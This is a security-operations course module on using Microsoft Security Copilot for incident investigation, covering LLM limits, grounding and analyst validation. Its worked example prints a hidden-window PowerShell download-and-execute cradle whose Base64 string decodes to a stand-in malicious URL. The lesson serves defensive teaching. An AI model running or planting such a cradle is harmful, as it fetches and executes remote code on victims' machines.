5.1 Generative AI for Security Operations
Generative AI for Security Operations
Domain 3 — Manage Incident Response: "Investigate incidents by using agentic AI, including embedded Copilot for Security." Understanding generative AI fundamentals is prerequisite to using Copilot effectively and evaluating its output critically.
Introduction
Before using Security Copilot, you need to understand what it is and what it is not. Copilot is not a button that solves incidents. It is not an analyst replacement. It is not infallible. It is a generative AI assistant that processes natural language prompts and produces natural language responses, grounded in security data from your environment and Microsoft’s threat intelligence. Its output is often excellent, sometimes wrong, and always requires validation by a qualified analyst.
This subsection provides the conceptual foundation for understanding how Copilot works, why grounding matters for security accuracy, what hallucination risk means in an investigation context (where a wrong answer is not just unhelpful — it can lead to incorrect response actions), and what realistic expectations look like for AI-assisted security operations.
What large language models are (and are not)
Security Copilot is built on large language models (LLMs) — the same foundational technology as ChatGPT, but with critical additions for security operations. Understanding LLMs at a conceptual level helps you predict when Copilot will be accurate and when it might produce incorrect output.
An LLM is a neural network trained on massive amounts of text data. It learns patterns in language — not facts, not logic, not reasoning, but statistical patterns of which words follow which other words in which contexts. When you prompt Copilot with “Summarise this incident,” the model generates a response by predicting the most likely next word, then the next, then the next, based on the patterns it learned during training and the context of your prompt.
What this means for security operations:
LLMs are excellent at summarisation — taking a large volume of alert data, log entries, and investigation notes, and producing a coherent narrative. They are excellent at translation — converting natural language (“show me all failed sign-ins from Russia in the last 24 hours”) into KQL queries. They are excellent at explanation — describing what a PowerShell script does, what an alert means, or what a MITRE ATT&CK technique involves. These are language tasks, and LLMs are exceptionally good at language tasks.
LLMs are less reliable at reasoning about novel situations that were not represented in their training data, at mathematical calculations, at precise factual recall (they may “remember” training data incorrectly), and at distinguishing between plausible-sounding output and correct output. These limitations are not bugs — they are inherent characteristics of how statistical language models work.
LLMs sometimes generate output that is confidently stated, grammatically correct, and completely wrong. In a casual conversation, this is an inconvenience. In a security investigation, it is dangerous. If Copilot generates a KQL query that looks correct but has a subtle logical error (wrong operator, incorrect time window, missing filter), the query returns incorrect results — and you may base investigation conclusions on those results. If Copilot summarises an incident and includes a detail that does not exist in the actual alert data, you may report a finding that is not supported by evidence. Every Copilot output must be validated before it is acted upon or documented.
Grounding: why Security Copilot is not just an LLM
The difference between a general-purpose LLM and Security Copilot is grounding — the mechanism that connects the model to your organisation’s actual security data. When you ask Copilot “Summarise incident INC-2026-0321,” it does not generate a summary from its training data (which knows nothing about your incidents). It retrieves the incident data from Defender XDR, feeds that data into the prompt context, and generates a summary grounded in the actual incident details.
Grounding sources include:
Microsoft Defender XDR — incidents, alerts, device timelines, email events, identity events, and Advanced Hunting data from your tenant.
Microsoft Sentinel — log data, analytics rules, incidents, and hunting queries from your Sentinel workspace.
Microsoft Entra ID — sign-in logs, user risk data, conditional access evaluation results.
Microsoft Purview — audit log data, DLP findings, compliance status.
Microsoft threat intelligence — Microsoft’s own threat intelligence database, which includes threat actor profiles, attack technique descriptions, IOC databases, and vulnerability information.
Third-party plugins — additional data sources connected through the plugin architecture (custom APIs, SOAR platforms, ITSM tools).
The quality of Copilot’s output depends directly on the quality and availability of grounding data. If your Sentinel workspace does not contain the relevant logs, Copilot cannot query them. If your Defender XDR incident is incomplete (missing correlated alerts because a connector is misconfigured), Copilot’s summary will be incomplete. Grounding is only as good as the data infrastructure you built in Modules 1-4.
What Copilot can and cannot do
| Task | Copilot's ability | Analyst's role |
|---|---|---|
| Summarise a complex incident | Excellent — fast, comprehensive | Verify accuracy against raw data |
| Explain what an alert means | Excellent — contextual explanation | Assess relevance to your environment |
| Generate KQL queries from natural language | Good — usually correct, sometimes wrong | Validate query logic before running |
| Analyse a PowerShell/Python script | Excellent — detailed breakdown | Verify against known malware patterns |
| Recommend response actions | Good — reasonable suggestions | Evaluate appropriateness for context |
| Draft an incident report | Good — structured, comprehensive | Edit for accuracy, add context |
| Determine root cause of a novel attack | Limited — may miss novel patterns | Apply investigation expertise |
| Make response decisions | Cannot — suggests, does not decide | All decisions are the analyst's |
| Access data outside your tenant | Cannot — grounded to your data only | Understand data boundaries |
| Replace analyst expertise | Cannot — amplifies, does not replace | You are the expert; Copilot is the tool |
The accuracy problem: why validation is non-negotiable
Copilot’s output is correct most of the time. “Most of the time” is not good enough for security operations, where a single incorrect conclusion can lead to wrong response actions, missed threats, or false reports to management.
Scenario 1: KQL query with a subtle error. You ask Copilot to generate a query for “all sign-ins from Russia in the last 24 hours.” Copilot generates a query that filters on LocationDetails.countryOrRegion == "Russia". But the correct value in your logs is "RU" (ISO country code), not "Russia" (full country name). The query returns zero results. If you trust the query without validation, you conclude there were no sign-ins from Russia — when in fact there were 15. The investigation misses the compromise.
Scenario 2: Incident summary that includes a non-existent detail. Copilot summarises an incident and states “the attacker exfiltrated 2.3 GB of data from the customer-data storage account.” You include this in the incident report. But the actual incident data shows the attacker accessed the storage account — it does not confirm data download volume. Copilot inferred the detail from the alert description, but the specific number was hallucinated. The incident report now contains an unsupported claim.
Scenario 3: Response recommendation that is inappropriate for context. Copilot recommends “disable the compromised user’s account.” This is generally correct for a compromised account. But in this case, the user is the CFO who is about to join a board meeting in 15 minutes. Disabling their account without coordination will disrupt a critical business function. Copilot does not know about the board meeting. The analyst does.
The validation principle: Copilot output is a draft, not a deliverable. Every KQL query is tested before trusting results. Every incident summary is cross-checked against the raw alert data. Every response recommendation is evaluated against operational context. This validation step takes 2-5 minutes — a small investment compared to the hours Copilot saves in generating the initial output.
Realistic expectations for AI-assisted SOC operations
Security Copilot does not transform a novice into an expert. It transforms an expert into a faster expert. The acceleration is real and significant — an experienced analyst using Copilot can investigate incidents 40-60% faster than the same analyst working manually. But the acceleration depends on the analyst’s ability to evaluate and refine Copilot’s output.
Where Copilot saves the most time:
Alert triage — Copilot can summarise a complex multi-alert incident in 10 seconds that would take an analyst 10 minutes to read through manually. This is the highest-value use case for daily SOC operations.
KQL query generation — translating investigation questions into KQL queries. Instead of writing queries from scratch, the analyst describes what they need in natural language and Copilot generates the query. The analyst validates and runs it. Time saved: 5-15 minutes per query.
Script analysis — when an alert includes a suspicious PowerShell, Python, or bash script, Copilot analyses the script and explains what each section does. This is particularly valuable for obfuscated scripts that would take significant manual effort to deobfuscate and analyse.
Report drafting — generating the initial draft of an incident report from the investigation data. The analyst edits for accuracy, adds context, and refines the conclusions. Time saved: 30-60 minutes per report.
Where Copilot does not save time:
Novel attack patterns — if the attack is truly novel (not represented in training data or threat intelligence), Copilot may not recognise it. The analyst’s pattern recognition and investigative intuition remain essential.
Contextual decisions — Copilot does not know your organisation’s risk tolerance, business context, or operational constraints. Response decisions require human judgement.
Evidence validation — confirming that investigation findings are supported by the evidence requires the analyst to examine the raw data. Copilot can point you to the data, but you must verify it.
Retrieval vs reasoning: understanding Copilot’s strengths
Copilot excels at retrieval tasks — finding data, summarising data, and translating between formats (natural language to KQL, raw data to narrative, technical findings to executive summary). These are tasks where the answer exists in the grounding data and Copilot needs to find and present it.
Copilot is weaker at reasoning tasks — determining whether a pattern of activity is malicious, predicting what an attacker will do next, or deciding which of two ambiguous findings is more important. These tasks require judgement that the model approximates from training patterns but does not truly perform.
Practical implication for SOC workflow: Delegate retrieval to Copilot. Retain reasoning for the analyst.
Retrieval examples (delegate): “What are the alerts in this incident?” “Generate a KQL query for sign-ins from Russia.” “Explain what this PowerShell command does.” “List the MITRE ATT&CK techniques in this incident.”
Reasoning examples (retain): “Is this a true positive or a false positive?” “Should we isolate this server or restrict its network access?” “Is the data exposure severe enough to trigger regulatory notification?” “Is this attacker likely to return through a different vector?”
The distinction is not always clear-cut — some tasks blend retrieval and reasoning. Copilot’s MITRE ATT&CK mapping is mostly retrieval (matching observed activity to documented techniques) but includes reasoning when the activity does not perfectly match any technique. In these blended cases, validate the reasoning component even if the retrieval component is clearly correct.
Worked comparison: script analysis manual vs Copilot
To make the time difference concrete, consider a real-world script analysis scenario.
A Defender for Endpoint alert includes this PowerShell command line:
powershell -w hidden -nop -c "IEX([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('aHR0cHM6Ly9tYWxpY2lvdXMuc2l0ZS9wYXlsb2Fk')))"
Manual analysis (15-20 minutes): Recognise Base64 encoding. Extract the Base64 string. Decode it using a Base64 decoder (CyberChef, PowerShell, or Python). Read the decoded content (a URL). Recognise that IEX downloads and executes content from the URL. Check the URL against threat intelligence. Assess the overall purpose: this is a download-and-execute cradle — Stage 1 of a multi-stage attack. Document the findings: the execution technique, the C2 URL, and the assessment.
Copilot analysis (30 seconds): Paste the command into Copilot with the prompt “Analyse this PowerShell command. Decode any encoded content. Identify IOCs. Assess the purpose.”
Copilot responds: “This PowerShell command uses hidden window mode (-w hidden) and no profile (-nop) to execute a Base64-encoded Invoke-Expression command. The decoded Base64 string is the URL ‘https://malicious.site/payload'. The command downloads and executes content from this URL using IEX (Invoke-Expression), which is a common download-and-execute cradle used for initial payload delivery. IOC: malicious.site. Assessment: Stage 1 payload delivery — the downloaded content is likely a second-stage implant or C2 beacon.”
Analyst validation (1 minute): Manually decode the Base64 to confirm the URL matches Copilot’s decoding. Check the URL against threat intelligence. Confirmed — the analysis is accurate.
Total: 1.5 minutes with Copilot vs 15-20 minutes manual. For heavily obfuscated scripts with multiple layers of encoding, variable substitution, and string concatenation, the time savings are even greater — 30 seconds vs 45-60 minutes.
Try it yourself
If your organisation has Security Copilot enabled, navigate to securitycopilot.microsoft.com and explore the standalone experience. Try a simple prompt: "What is Microsoft Defender XDR?" and evaluate the response. Is it accurate? Is it grounded in your environment's data, or is it a general knowledge response? Then try an environment-specific prompt: "Show me the most recent incidents in my Defender XDR portal." Compare the two responses — the first is generic knowledge (from training data), the second is grounded in your data (from the Defender XDR plugin). This demonstrates the grounding difference.
What you should observe
The general knowledge prompt produces a textbook-style response. The environment-specific prompt produces a response that references your actual incidents, alert names, and affected entities. If Copilot cannot access your Defender XDR data (plugin not configured, insufficient permissions), the environment-specific prompt returns an error or a generic response — demonstrating that grounding requires properly configured data access.
Knowledge check
Check your understanding
1. Copilot generates a KQL query for your investigation. How should you handle it?
2. What is "grounding" in the context of Security Copilot?
3. A junior analyst asks: "If Copilot can summarise incidents and generate KQL, why do I need to learn investigation skills?" What do you tell them?